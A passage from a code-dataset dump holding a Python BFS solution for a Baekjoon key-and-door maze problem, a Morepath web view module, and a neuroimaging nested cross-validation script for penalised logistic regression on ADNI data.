start_c, 0))\nvisited[start_r][start_c][0b000000] = 0\n\nmoves = ((-1, 0), (1, 0), (0, -1), (0, 1))\nanswer = -1\n\nwhile q:\n level, r, c, key = q.popleft()\n\n if maps[r][c] == '1':\n answer = level\n break\n\n for dr, dc in moves:\n if 0 <= r + dr < N and 0 <= c + dc < M:\n # 0. 출구인 경우\n if maps[r + dr][c + dc] == '1':\n q.appendleft((level + 1, r + dr, c + dc, key))\n # 1. 벽인 경우 -> 이동 불가\n elif maps[r + dr][c + dc] == '#': continue\n # 2. 열쇠인 경우 -> key 갱신 후 방문\n elif maps[r + dr][c + dc] in ['a', 'b', 'c', 'd', 'e', 'f']:\n new_key = key | (1 << (ord(maps[r + dr][c + dc]) - ord('a')))\n \n if visited[r + dr][c + dc][new_key] > level + 1:\n visited[r + dr][c + dc][new_key] = level + 1\n q.append((level + 1, r + dr, c + dc, new_key))\n # 3. 문인 경우 -> 해당 열쇠를 얻은 상태에서만 통과\n elif maps[r + dr][c + dc] in ['A', 'B', 'C', 'D', 'E', 'F']:\n if key & (1 << (ord(maps[r + dr][c + dc]) - ord('A'))):\n if visited[r + dr][c + dc][key] > level + 1:\n visited[r + dr][c + dc][key] = level + 1\n q.append((level + 1, r + dr, c + dc, key))\n # 4. 빈 칸인 경우\n elif maps[r + dr][c + dc] == '.':\n if visited[r + dr][c + dc][key] > level + 1:\n visited[r + dr][c + dc][key] = level + 1\n q.append((level + 1, r + dr, c + dc, key))\n\nprint(answer)\n","repo_name":"poodlepoodle/problem-solving","sub_path":"baekjoon/1194_2.py","file_name":"1194_2.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"12548217430","text":"from more.marshmallow import Error\n\nfrom .app import App\nfrom . import model\nfrom .schemas import AnalysisSchema\n\n\n@App.html(model=model.Data, template='map.pt')\ndef view_map(self, request):\n return {\n 'bounds': self.bounds\n }\n\n\nschema = AnalysisSchema()\n\n\ndef load_analyse_params(request):\n if request.content_type == 'application/json':\n data = request.json\n else:\n data = parse_params(request.params)\n data, errors = schema.load(data)\n if errors:\n raise Error(errors)\n return data\n\n\ndef parse_params(params):\n \"\"\"Parse parameters into a dictionary with sub dicts.\"\"\"\n data = []\n for item in params.items():\n item = split_item(*item)\n data.append(item)\n return merge(data)\n\n\ndef merge(data):\n if not data:\n return {}\n if len(data) == 1:\n return data[0]\n return merge_dicts(data[0], merge(data[1:]))\n\n\ndef merge_dicts(d1, d2):\n \"\"\"Merge two dicts and any subdicts they might have.\"\"\"\n result = d1.copy()\n for key, val in d2.items():\n if key not in result:\n result[key] = val\n else:\n result[key] = merge_dicts(result[key], val)\n return result\n\n\ndef split_item(key, value):\n \"\"\"Split an item like ('key[subkey]', 'value') into\n {'key': {'subkey': 'value'}}.\n \"\"\"\n split_key = key.rsplit('[', 1)\n if len(split_key) == 1:\n return {split_key[0]: value}\n key = split_key[0]\n value = {split_key[1][:-1]: value}\n return split_item(key, value)\n\n\n@App.json(model=model.Data, request_method='POST', load=load_analyse_params)\ndef view_analysis(self, request, analyse_params):\n result = self.analyse(**analyse_params)\n return model.Data.json_parsable(result)\n","repo_name":"inytar/door2door-assignment","sub_path":"d2d/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1235718236","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 30 20:03:12 2014\n\n@author: edouard.duchesnay@cea.fr\n\nmkdir 
/neurospin/brainomics/2013_adni/MCIc-CTL-FS_cs_modselectcv\ncd /neurospin/brainomics/2013_adni/MCIc-CTL-FS_cs_modselectcv\n\ncp ../MCIc-CTL-FS/X* .\ncp ../MCIc-CTL-FS/y.npy .\ncp ../MCIc-CTL-FS/mask.npy .\ncp ../MCIc-CTL-FS/lrh.pial.gii .\n\n\n# Start by running Locally with 2 cores, to check that everything os OK)\nInterrupt after a while CTL-C\nmapreduce.py --map /neurospin/brainomics/2013_adni/MCIc-CTL-FS_cs_modselectcv/config_modselectcv.json --ncore 2\n# 1) Log on gabriel:\nssh -t gabriel.intra.cea.fr\n# 2) Run one Job to test\nqsub -I\ncd /neurospin/tmp/ed203246/MCIc-CTL-FS_cs_modselectcv\n./job_Global_long.pbs\n# 3) Run on cluster\nqsub job_Global_long.pbs\n# 4) Log out and pull Pull\nexit\n/neurospin/brainomics/2013_adni/MCIc-CTL-FS_cs_modselectcv/sync_pull.sh\n# Reduce\nmapreduce.py --reduce /neurospin/brainomics/2013_adni/MCIc-CTL-FS_cs_modselectcv/config_modselectcv.json\n\n\n%run -i ~/git/scripts/2013_adni/MCIc-CTL-FS/03_tvenet_modselectcv_cs.py\n\n\"\"\"\n\nimport os\nimport json\nimport numpy as np\nfrom collections import OrderedDict\nfrom sklearn.cross_validation import StratifiedKFold\nimport nibabel\nfrom sklearn.metrics import roc_auc_score, precision_recall_fscore_support\nfrom sklearn.feature_selection import SelectKBest\nfrom parsimony.estimators import LogisticRegressionL1L2TV\nimport parsimony.functions.nesterov.tv as tv_helper\nfrom brainomics import array_utils\nfrom scipy.stats import binom_test\n\nimport mapreduce\nfrom statsmodels.stats.inter_rater import fleiss_kappa\n\nNFOLDS_INNER, NFOLDS_OUTER = 5, 5\npenalty_start = 2\n\nWD = \"/neurospin/brainomics/2013_adni/MCIc-CTL-FS_cs_modselectcv\"\ndef config_filename(): return os.path.join(WD, \"config_modselectcv.json\")\ndef results_filenane(): return os.path.join(WD, \"MCIc-CTL-FS_cs_modselectcv.xlsx\")\n\n# for comparision we need the results with spatially smoothed data\nWD_s = \"/neurospin/brainomics/2013_adni/MCIc-CTL-FS_cs_s_modselectcv\"\ndef config_filename_s(): return os.path.join(WD_s, \"config_modselectcv.json\")\ndef results_filenane_s(): return os.path.join(WD_s, \"MCIc-CTL-FS_cs_s_modselectcv.xlsx\")\n\ndef init():\n INPUT_DATA_X = os.path.join('X.npy')\n INPUT_DATA_y = os.path.join('y.npy')\n STRUCTURE = dict(mesh=\"lrh.pial.gii\", mask=\"mask.npy\")\n #WD = os.path.join(WD, 'logistictvenet_5cv')\n if not os.path.exists(WD):\n os.makedirs(WD)\n\n os.chdir(WD)\n\n #############################################################################\n ## Create config file\n y = np.load(INPUT_DATA_y)\n X = np.load(INPUT_DATA_X)\n from parsimony.utils.penalties import l1_max_logistic_loss\n assert l1_max_logistic_loss(X[:, 3:], y) == 0.23271180133879535\n if os.path.exists(\"config_modselectcv.json\"):\n old_conf = json.load(open(\"config_modselectcv.json\"))\n cv = old_conf[\"resample\"]\n else:\n cv_outer = [[tr, te] for tr,te in StratifiedKFold(y.ravel(), n_folds=NFOLDS_OUTER, random_state=42)]\n \"\"\"\n cv_outer = [[np.array(tr), np.array(te)] for tr,te in json.load(open(\"/neurospin/brainomics/2013_adni/MCIc-CTL-FS/config_5cv.json\", \"r\"))[\"resample\"][1:]]\n \"\"\"\n import collections\n cv = collections.OrderedDict()\n for cv_outer_i, (tr_val, te) in enumerate(cv_outer):\n cv[\"cv%02d/refit\" % cv_outer_i] = [tr_val, te]\n cv_inner = StratifiedKFold(y[tr_val].ravel(), n_folds=NFOLDS_INNER, random_state=42)\n for cv_inner_i, (tr, val) in enumerate(cv_inner):\n cv[\"cv%02d/cvnested%02d\" % (cv_outer_i, cv_inner_i)] = [tr_val[tr], tr_val[val]]\n\n for k in cv:\n cv[k] = [cv[k][0].tolist(), 
cv[k][1].tolist()]\n\n print(cv.keys())\n # Some QC\n N = float(len(y)); p0 = np.sum(y==0) / N; p1 = np.sum(y==1) / N;\n for k in cv:\n tr, val = cv[k]\n tr, val = np.array(tr), np.array(val)\n print(k, \"\\t: tr+val=\", len(tr) + len(val))\n assert not set(tr).intersection(val)\n assert abs(np.sum(y[tr]==0)/float(len(y[tr])) - p0) < 0.01\n assert abs(np.sum(y[tr]==1)/float(len(y[tr])) - p1) < 0.01\n if k.count(\"refit\"):\n te = val\n assert len(tr) + len(te) == len(y)\n assert abs(len(y[tr])/N - (1 - 1./NFOLDS_OUTER)) < 0.01\n else:\n te = np.array(cv[k.split(\"/\")[0] + \"/refit\"])[1]\n assert abs(len(y[tr])/N - (1 - 1./NFOLDS_OUTER) * (1 - 1./NFOLDS_INNER)) < 0.01\n assert not set(tr).intersection(te)\n assert not set(val).intersection(te)\n len(tr) + len(val) + len(te) == len(y)\n\n tv_ratios = [0., .2, .8]\n l1_ratios = [np.array([1., .1, .9, 1]),\n np.array([1., .01, .99, 1]),\n np.array([1., .9, .1, 1])] # [alpha, l1 l2 tv]\n alphas_l1l2tv = [.01, .1]\n alphas_l2tv = [round(alpha, 10) for alpha in 10. ** np.arange(-2, 4)]\n k_range = [-1]\n l1l2tv =[np.array([alpha, float(1-tv), float(1-tv), tv]) * l1_ratio\n for alpha in alphas_l1l2tv for tv in tv_ratios for l1_ratio in l1_ratios]\n # specific case for without l1 since it supports larger penalties\n l2tv =[np.array([alpha, 0., float(1-tv), tv])\n for alpha in alphas_l2tv for tv in tv_ratios]\n params = l1l2tv + l2tv\n params = [param.tolist() + [k] for k in k_range for param in params]\n params = {\"_\".join([str(p) for p in param]):param for param in params}\n assert len(params) == 36\n user_func_filename = os.path.join(os.environ[\"HOME\"],\n \"git\", \"scripts\", \"2013_adni\", \"MCIc-CTL-FS\",\n \"03_tvenet_modselectcv_cs.py\")\n #print __file__, os.path.abspath(__file__)\n print(\"user_func\", user_func_filename)\n #import sys\n #sys.exit(0)\n # Use relative path from config.json\n config = dict(data=dict(X=INPUT_DATA_X, y=INPUT_DATA_y),\n params=params, resample=cv,\n structure=STRUCTURE,\n penalty_start = penalty_start,\n map_output=\"modselectcv\",\n user_func=user_func_filename,\n #reduce_input=\"rndperm/*/*\",\n reduce_group_by=\"user_defined\",\n reduce_output=\"MCIc-CTL-FS_cs_modselectcv.csv\")\n json.dump(config, open(os.path.join(WD, \"config_modselectcv.json\"), \"w\"))\n\n #############################################################################\n # Build utils files: sync (push/pull) and PBS\n import brainomics.cluster_gabriel as clust_utils\n sync_push_filename, sync_pull_filename, WD_CLUSTER = \\\n clust_utils.gabriel_make_sync_data_files(WD)\n cmd = \"mapreduce.py --map %s/config_modselectcv.json\" % WD_CLUSTER\n clust_utils.gabriel_make_qsub_job_files(WD, cmd)\n #############################################################################\n # Sync to cluster\n print(\"Sync data to gabriel.intra.cea.fr: \")\n os.system(sync_push_filename)\n #############################################################################\n print(\"# Start by running Locally with 2 cores, to check that everything os OK)\")\n print(\"Interrupt after a while CTL-C\")\n print(\"mapreduce.py --map %s/config_modselectcv.json --ncore 2\" % WD)\n #os.system(\"mapreduce.py --mode map --config %s/config.json\" % WD)\n print(\"# 1) Log on gabriel:\")\n print('ssh -t gabriel.intra.cea.fr')\n print(\"# 2) Run one Job to test\")\n print(\"qsub -I\")\n print(\"cd %s\" % WD_CLUSTER)\n print(\"./job_Global_long.pbs\")\n print(\"# 3) Run on cluster\")\n print(\"qsub job_Global_long.pbs\")\n print(\"# 4) Log out and pull Pull\")\n 
print(\"exit\")\n print(sync_pull_filename)\n #############################################################################\n print(\"# Reduce\")\n print(\"mapreduce.py --reduce %s/config_modselectcv.json\" % WD)\n\n\ndef load_globals(config):\n import mapreduce as GLOBAL # access to global variables\n GLOBAL.DATA = GLOBAL.load_data(config[\"data\"])\n import brainomics.mesh_processing as mesh_utils\n mesh_coord, mesh_triangles = mesh_utils.mesh_arrays(config[\"structure\"][\"mesh\"])\n mask = np.load(config[\"structure\"][\"mask\"])\n GLOBAL.mesh_coord, GLOBAL.mesh_triangles, GLOBAL.mask = mesh_coord, mesh_triangles, mask\n try:\n A = tv_helper.linear_operator_from_mesh(GLOBAL.mesh_coord, GLOBAL.mesh_triangles, GLOBAL.mask)\n except:\n A, _ = tv_helper.nesterov_linear_operator_from_mesh(GLOBAL.mesh_coord, GLOBAL.mesh_triangles, GLOBAL.mask)\n GLOBAL.A = A\n GLOBAL.CONFIG = config\n\ndef resample(config, resample_nb):\n import mapreduce as GLOBAL # access to global variables\n GLOBAL.DATA = GLOBAL.load_data(config[\"data\"])\n resample = config[\"resample\"][resample_nb]\n if resample is not None:\n GLOBAL.DATA_RESAMPLED = {k: [GLOBAL.DATA[k][idx, ...] for idx in resample]\n for k in GLOBAL.DATA}\n else: # resample is None train == test\n GLOBAL.DATA_RESAMPLED = {k: [GLOBAL.DATA[k] for idx in [0, 1]]\n for k in GLOBAL.DATA}\n\ndef mapper(key, output_collector):\n import mapreduce as GLOBAL # access to global variables:\n #raise ImportError(\"could not import \")\n # GLOBAL.DATA, GLOBAL.STRUCTURE, GLOBAL.A\n # GLOBAL.DATA ::= {\"X\":[Xtrain, ytrain], \"y\":[Xtest, ytest]}\n # key: list of parameters\n Xtr = GLOBAL.DATA_RESAMPLED[\"X\"][0]\n Xte = GLOBAL.DATA_RESAMPLED[\"X\"][1]\n ytr = GLOBAL.DATA_RESAMPLED[\"y\"][0]\n yte = GLOBAL.DATA_RESAMPLED[\"y\"][1]\n print(key, \"Data shape:\", Xtr.shape, Xte.shape, ytr.shape, yte.shape)\n # STRUCTURE = GLOBAL.STRUCTURE\n #alpha, ratio_l1, ratio_l2, ratio_tv, k = key\n #key = np.array(key)\n class_weight=\"auto\" # unbiased\n alpha = float(key[0])\n l1, l2, tv, k = alpha * float(key[1]), alpha * float(key[2]), alpha * float(key[3]), key[4]\n print(\"l1:%f, l2:%f, tv:%f, k:%i\" % (l1, l2, tv, k))\n if k != -1:\n k = int(k)\n aov = SelectKBest(k=k)\n aov.fit(Xtr[..., penalty_start:], ytr.ravel())\n mask = GLOBAL.mask != 0\n mask[mask] = aov.get_support()\n #print mask.sum()\n A, _ = tv_helper.nesterov_linear_operator_from_mesh(GLOBAL.mesh_coord, GLOBAL.mesh_triangles, mask)\n Xtr_r = np.hstack([Xtr[:, :penalty_start], Xtr[:, penalty_start:][:, aov.get_support()]])\n Xte_r = np.hstack([Xte[:, :penalty_start], Xte[:, penalty_start:][:, aov.get_support()]])\n else:\n mask = np.ones(Xtr.shape[0], dtype=bool)\n Xtr_r = Xtr\n Xte_r = Xte\n A = GLOBAL.A\n mod = LogisticRegressionL1L2TV(l1, l2, tv, A, penalty_start=penalty_start,\n class_weight=class_weight)\n mod.fit(Xtr_r, ytr)\n y_pred = mod.predict(Xte_r)\n proba_pred = mod.predict_probability(Xte_r)\n ret = dict(y_pred=y_pred, y_true=yte, beta=mod.beta, mask=mask, proba_pred=proba_pred)\n if output_collector:\n output_collector.collect(key, ret)\n else:\n return ret\n###############################################################################\n## 2017\n###############################################################################\ndef scores(key, paths, config, as_dataframe=False):\n import mapreduce\n print(key)\n if (len(paths) != NFOLDS_INNER) or (len(paths) != NFOLDS_OUTER):\n print(\"Failed for key %s\" % key)\n return None\n values = [mapreduce.OutputCollector(p) for p in paths]\n values = 
[item.load() for item in values]\n y_true = [item[\"y_true\"].ravel() for item in values]\n y_pred = [item[\"y_pred\"].ravel() for item in values]\n y_true = np.concatenate(y_true)\n y_pred = np.concatenate(y_pred)\n prob_pred = [item[\"proba_pred\"].ravel() for item in values]\n prob_pred = np.concatenate(prob_pred)\n\n # Prediction performances\n p, r, f, s = precision_recall_fscore_support(y_true, y_pred, average=None)\n auc = roc_auc_score(y_true, prob_pred) #area under curve score.\n\n # P-values\n success = r * s\n success = success.astype('int')\n prob_class1 = np.count_nonzero(y_true) / float(len(y_true))\n pvalue_recall0_true_prob = binom_test(success[0], s[0], 1 - prob_class1,alternative = 'greater')\n pvalue_recall1_true_prob = binom_test(success[1], s[1], prob_class1,alternative = 'greater')\n pvalue_recall0_unknwon_prob = binom_test(success[0], s[0], 0.5,alternative = 'greater')\n pvalue_recall1_unknown_prob = binom_test(success[1], s[1], 0.5,alternative = 'greater')\n pvalue_recall_mean = binom_test(success[0]+success[1], s[0] + s[1], p=0.5,alternative = 'greater')\n\n\n # Beta's measures of similarity\n betas = np.hstack([item[\"beta\"][penalty_start:, :] for item in values]).T\n\n # Correlation\n R = np.corrcoef(betas)\n #print R\n R = R[np.triu_indices_from(R, 1)]\n # Fisher z-transformation / average\n z_bar = np.mean(1. / 2. * np.log((1 + R) / (1 - R)))\n # bracktransform\n r_bar = (np.exp(2 * z_bar) - 1) / (np.exp(2 * z_bar) + 1)\n\n # threshold betas to compute fleiss_kappa and DICE\n try:\n betas_t = np.vstack([array_utils.arr_threshold_from_norm2_ratio(betas[i, :], .99)[0] for i in range(betas.shape[0])])\n #print \"--\", np.sqrt(np.sum(betas_t ** 2, 1)) / np.sqrt(np.sum(betas ** 2, 1))\n #print(np.allclose(np.sqrt(np.sum(betas_t ** 2, 1)) / np.sqrt(np.sum(betas ** 2, 1)), [0.99]*5,\n # rtol=0, atol=1e-02))\n\n # Compute fleiss kappa statistics\n beta_signed = np.sign(betas_t)\n table = np.zeros((beta_signed.shape[1], 3))\n table[:, 0] = np.sum(beta_signed == 0, 0)\n table[:, 1] = np.sum(beta_signed == 1, 0)\n table[:, 2] = np.sum(beta_signed == -1, 0)\n fleiss_kappa_stat = fleiss_kappa(table)\n\n # Paire-wise Dice coeficient\n ij = [[i, j] for i in range(betas.shape[0]) for j in range(i+1, betas.shape[0])]\n dices = list()\n for idx in ij:\n A, B = beta_signed[idx[0], :], beta_signed[idx[1], :]\n dices.append(float(np.sum((A == B)[(A != 0) & (B != 0)])) / (np.sum(A != 0) + np.sum(B != 0)))\n dice_bar = np.mean(dices)\n except:\n dice_bar = fleiss_kappa_stat = 0\n\n scores = OrderedDict()\n scores['key'] = key\n try:\n a, l1, l2 , tv, k = [float(par) for par in key.split(\"_\")]\n print(a, l1, l2 , tv)\n scores['a'] = a\n scores['l1'] = l1\n scores['l2'] = l2\n scores['tv'] = tv\n left = float(1 - tv)\n if left == 0: left = 1.\n scores['l1_ratio'] = float(l1) / left\n except:\n pass\n scores['recall_0'] = r[0]\n scores['recall_1'] = r[1]\n scores['recall_mean'] = r.mean()\n scores[\"auc\"] = auc\n scores['pvalue_recall0_true_prob_one_sided'] = pvalue_recall0_true_prob\n scores['pvalue_recall1_true_prob_one_sided'] = pvalue_recall1_true_prob\n scores['pvalue_recall0_unknwon_prob_one_sided'] = pvalue_recall0_unknwon_prob\n scores['pvalue_recall1_unknown_prob_one_sided'] = pvalue_recall1_unknown_prob\n scores['pvalue_recall_mean'] = pvalue_recall_mean\n scores['prop_non_zeros_mean'] = float(np.count_nonzero(betas_t)) / \\\n float(np.prod(betas.shape))\n scores['beta_r_bar'] = r_bar\n scores['beta_fleiss_kappa'] = fleiss_kappa_stat\n scores['beta_dice_bar'] = 
dice_bar\n\n scores['beta_dice'] = str(dices)\n scores['beta_r'] = str(R)\n\n if as_dataframe:\n scores = pd.DataFrame([list(scores.values())], columns=list(scores.keys()))\n\n return scores\n\n\ndef reducer(key, values):\n import os, glob, pandas as pd\n os.chdir(os.path.dirname(config_filename()))\n config = json.load(open(config_filename()))\n paths = glob.glob(os.path.join(config['map_output'], \"*\", \"*\", \"*\"))\n param_config_set = set([mapreduce.dir_from_param_list(p) for p in config['params']])\n assert len(paths) / len(param_config_set) == len(config['resample']), \"Nb run per param is not the one excpected\"\n paths.sort()\n assert len(paths) == 1080\n\n def close(vec, val, tol=1e-4):\n return np.abs(vec - val) < tol\n\n def groupby_paths(paths, pos):\n groups = {g:[] for g in set([p.split(\"/\")[pos] for p in paths])}\n for p in paths:\n groups[p.split(\"/\")[pos]].append(p)\n return groups\n\n def argmaxscore_bygroup(data, groupby='fold', param_key=\"key\", score=\"recall_mean\"):\n arg_max_byfold = list()\n for fold, data_fold in data.groupby(groupby):\n assert len(data_fold) == len(set(data_fold[param_key])) # ensure all param are diff\n arg_max_byfold.append([fold, data_fold.ix[data_fold[score].argmax()][param_key], data_fold[score].max()])\n return pd.DataFrame(arg_max_byfold, columns=[groupby, param_key, score])\n\n print('## Refit scores: cv*/refit/*')\n print('## -------------------------')\n byparams = groupby_paths([p for p in paths if not p.count(\"cvnested\") and not p.count(\"refit/refit\") ], 3)\n # k=\"1.0_0.7_0.0_0.3\"; v=byparams[key]\n byparams_scores = {k:scores(k, v, config) for k, v in byparams.items()}\n byparams_scores = {k: v for k, v in byparams_scores.items() if v is not None}\n\n data = [list(byparams_scores[k].values()) for k in byparams_scores]\n columns = list(byparams_scores[list(byparams_scores.keys())[0]].keys())\n scores_refit = pd.DataFrame(data, columns=columns)\n\n print('## doublecv scores by outer-cv and by params: cv*/cvnested*/*')\n print('## -----------------------------------------')\n data = list()\n bycv = groupby_paths([p for p in paths if p.count(\"cvnested\") and not p.count(\"refit/cvnested\") ], 1)\n for fold, paths_fold in bycv.items():\n print(fold)\n byparams = groupby_paths([p for p in paths_fold], 3)\n byparams_scores = {k:scores(k, v, config) for k, v in byparams.items()}\n byparams_scores = {k: v for k, v in byparams_scores.items() if v is not None}\n data += [[fold] + list(byparams_scores[k].values()) for k in byparams_scores]\n scores_dcv_byparams = pd.DataFrame(data, columns=[\"fold\"] + columns)\n assert np.all(np.array([g.shape[0] for d, g in scores_dcv_byparams.groupby('fold')]) == 136)\n\n # Different settings\n\n l1l2tv_all = scores_dcv_byparams\n\n l1l2tv_reduced = scores_dcv_byparams[\n (close(scores_dcv_byparams.a, 0.01) | close(scores_dcv_byparams.a, 0.1)) &\n (close(scores_dcv_byparams.l1_ratio, 0.1) | close(scores_dcv_byparams.l1_ratio, 0.9)) &\n (close(scores_dcv_byparams.tv, 0.2) | close(scores_dcv_byparams.tv, 0.8))]\n assert np.all(np.array([g.shape[0] for d, g in l1l2tv_reduced.groupby('fold')]) == 8)\n assert l1l2tv_reduced.shape[0] == 40\n\n l1l2tv_ridge_reduced = scores_dcv_byparams[\n (close(scores_dcv_byparams.a, 0.01) | close(scores_dcv_byparams.a, 0.1)) &\n (close(scores_dcv_byparams.l1_ratio, 0.1)) &\n (close(scores_dcv_byparams.tv, 0.2) | close(scores_dcv_byparams.tv, 0.8))]\n assert np.all(np.array([g.shape[0] for d, g in l1l2tv_ridge_reduced.groupby('fold')]) == 4)\n assert 
l1l2tv_ridge_reduced.shape[0] == 20\n\n l1l2tv_lasso_reduced = scores_dcv_byparams[\n (close(scores_dcv_byparams.a, 0.01) | close(scores_dcv_byparams.a, 0.1)) &\n (close(scores_dcv_byparams.l1_ratio, 0.9)) &\n (close(scores_dcv_byparams.tv, 0.2) | close(scores_dcv_byparams.tv, 0.8))]\n assert np.all(np.array([g.shape[0] for d, g in l1l2tv_lasso_reduced.groupby('fold')]) == 4)\n assert l1l2tv_lasso_reduced.shape[0] == 20\n\n l1l2_reduced = scores_dcv_byparams[\n (close(scores_dcv_byparams.a, 0.01) | close(scores_dcv_byparams.a, 0.1)) &\n (close(scores_dcv_byparams.l1_ratio, 0.1) | close(scores_dcv_byparams.l1_ratio, 0.9)) &\n (close(scores_dcv_byparams.tv, 0))]\n assert np.all(np.array([g.shape[0] for d, g in l1l2_reduced.groupby('fold')]) == 4)\n assert l1l2_reduced.shape[0] == 20\n\n l1l2_ridge_reduced = scores_dcv_byparams[\n (close(scores_dcv_byparams.a, 0.01) | close(scores_dcv_byparams.a, 0.1)) &\n (close(scores_dcv_byparams.l1_ratio, 0.1)) &\n (close(scores_dcv_byparams.tv, 0))]\n assert np.all(np.array([g.shape[0] for d, g in l1l2_ridge_reduced.groupby('fold')]) == 2)\n assert l1l2_ridge_reduced.shape[0] == 10\n\n l1l2_lasso_reduced = scores_dcv_byparams[\n (close(scores_dcv_byparams.a, 0.01) | close(scores_dcv_byparams.a, 0.1)) &\n (close(scores_dcv_byparams.l1_ratio, 0.9)) &\n (close(scores_dcv_byparams.tv, 0))]\n assert np.all(np.array([g.shape[0] for d, g in l1l2_lasso_reduced.groupby('fold')]) == 2)\n assert l1l2_lasso_reduced.shape[0] == 10\n\n print('## Model selection')\n print('## ---------------')\n l1l2tv_all = argmaxscore_bygroup(l1l2tv_all); l1l2tv_all[\"method\"] = \"l1l2tv_all\"\n\n l1l2tv_reduced = argmaxscore_bygroup(l1l2tv_reduced); l1l2tv_reduced[\"method\"] = \"l1l2tv_reduced\"\n\n l1l2tv_ridge_reduced = argmaxscore_bygroup(l1l2tv_ridge_reduced); l1l2tv_ridge_reduced[\"method\"] = \"l1l2tv_ridge_reduced\"\n\n l1l2tv_lasso_reduced = argmaxscore_bygroup(l1l2tv_lasso_reduced); l1l2tv_lasso_reduced[\"method\"] = \"l1l2tv_lasso_reduced\"\n\n l1l2_reduced = argmaxscore_bygroup(l1l2_reduced); l1l2_reduced[\"method\"] = \"l1l2_reduced\"\n\n l1l2_ridge_reduced = argmaxscore_bygroup(l1l2_ridge_reduced); l1l2_ridge_reduced[\"method\"] = \"l1l2_ridge_reduced\"\n\n l1l2_lasso_reduced = argmaxscore_bygroup(l1l2_lasso_reduced); l1l2_lasso_reduced[\"method\"] = \"l1l2_lasso_reduced\"\n\n scores_argmax_byfold = pd.concat([l1l2tv_all,\n l1l2tv_reduced, l1l2_reduced,\n l1l2tv_ridge_reduced, l1l2_ridge_reduced,\n l1l2tv_lasso_reduced, l1l2_lasso_reduced])\n\n print('## Apply best model on refited')\n print('## ---------------------------')\n l1l2tv_all = scores(\"l1l2tv_all\",\n [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"key\"])\n for index, row in l1l2tv_all.iterrows()],\n config, as_dataframe=True)\n\n l1l2tv_reduced = scores(\"l1l2tv_reduced\",\n [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"key\"])\n for index, row in l1l2tv_reduced.iterrows()],\n config, as_dataframe=True)\n\n l1l2tv_ridge_reduced = scores(\"l1l2tv_ridge_reduced\",\n [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"key\"])\n for index, row in l1l2tv_ridge_reduced.iterrows()],\n config, as_dataframe=True)\n\n l1l2tv_lasso_reduced = scores(\"l1l2tv_lasso_reduced\",\n [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"key\"])\n for index, row in l1l2tv_lasso_reduced.iterrows()],\n config, as_dataframe=True)\n\n l1l2_reduced = scores(\"l1l2_reduced\",\n [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"key\"])\n for 
index, row in l1l2_reduced.iterrows()],\n config, as_dataframe=True)\n\n l1l2_ridge_reduced = scores(\"l1l2_ridge_reduced\",\n [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"key\"])\n for index, row in l1l2_ridge_reduced.iterrows()],\n config, as_dataframe=True)\n\n l1l2_lasso_reduced = scores(\"l1l2_lasso_reduced\",\n [os.path.join(config['map_output'], row[\"fold\"], \"refit\", row[\"key\"])\n for index, row in l1l2_lasso_reduced.iterrows()],\n config, as_dataframe=True)\n\n scores_cv = pd.concat([l1l2tv_all,\n l1l2tv_reduced, l1l2_reduced,\n l1l2tv_ridge_reduced, l1l2_ridge_reduced,\n l1l2tv_lasso_reduced, l1l2_lasso_reduced,\n ])\n\n with pd.ExcelWriter(results_filename()) as writer:\n scores_refit.to_excel(writer, sheet_name='cv_by_param', index=False)\n scores_dcv_byparams.to_excel(writer, sheet_name='cv_cv_byparam', index=False)\n scores_argmax_byfold.to_excel(writer, sheet_name='cv_argmax', index=False)\n scores_cv.to_excel(writer, sheet_name='dcv', index=False)\n\n\n###############################################################################\ndef plot_scores():\n import numpy as np\n import pandas as pd\n import matplotlib.pyplot as plt\n from matplotlib.backends.backend_pdf import PdfPages\n import seaborn as sns\n\n input_filename = results_filename()\n outut_filename = input_filename.replace(\".xlsx\", \"_scores-by-tv.pdf\")\n\n # scores\n y_cols = ['recall_mean', 'auc', 'beta_r_bar', 'beta_fleiss_kappa', 'beta_dice_bar']\n x_col = 'tv'\n\n # colors\n #sns.palplot(sns.color_palette(\"Paired\"))\n pal = sns.color_palette(\"Paired\")\n colors = {(0.01, 0.1):pal[0],\n (0.1, 0.1):pal[1],\n (0.01, 0.9):pal[4],\n (0.1, 0.9):pal[5]}\n\n data = pd.read_excel(input_filename, sheetname='cv_by_param')\n # avoid poor rounding\n data.l1_ratio = np.asarray(data.l1_ratio).round(3); assert len(data.l1_ratio.unique()) == 5\n data.tv = np.asarray(data.tv).round(5); assert len(data.tv.unique()) == 11\n data.a = np.asarray(data.a).round(5); assert len(data.a.unique()) == 3\n def close(vec, val, tol=1e-4):\n return np.abs(vec - val) < tol\n data = data[close(data.l1_ratio, .1) | close(data.l1_ratio, .9)]\n data = data[close(data.a, .01) | close(data.a, .1)]\n data.sort_values(by=x_col, ascending=True, inplace=True)\n\n pdf = PdfPages(outut_filename)\n\n for y_col in y_cols:\n #y_col = y_cols[0]\n fig=plt.figure()\n for (l1, a), d in data.groupby([\"l1_ratio\", \"a\"]):\n print((a, l1))\n plt.plot(d.tv, d[y_col], color=colors[(a,l1)], label=\"a:%.2f, l1/l2:%.1f\" % (a, l1))\n plt.xlabel(x_col)\n plt.ylabel(y_col)\n plt.suptitle(y_col)\n plt.legend()\n pdf.savefig(fig); plt.clf()\n pdf.close()\n\n\n###############################################################################\n## 2015\n###############################################################################\n\ndef scores_2015(key, paths, config, ret_y=False):\n import glob, mapreduce\n print(key)\n values = [mapreduce.OutputCollector(p) for p in paths]\n values = [item.load() for item in values]\n recall_mean_std = np.std([np.mean(precision_recall_fscore_support(\n item[\"y_true\"].ravel(), item[\"y_pred\"])[1]) for item in values]) / np.sqrt(len(values))\n y_true = [item[\"y_true\"].ravel() for item in values]\n y_pred = [item[\"y_pred\"].ravel() for item in values]\n prob_pred = [item[\"proba_pred\"].ravel() for item in values]\n y_true = np.concatenate(y_true)\n y_pred = np.concatenate(y_pred)\n prob_pred = np.concatenate(prob_pred)\n p, r, f, s = precision_recall_fscore_support(y_true, 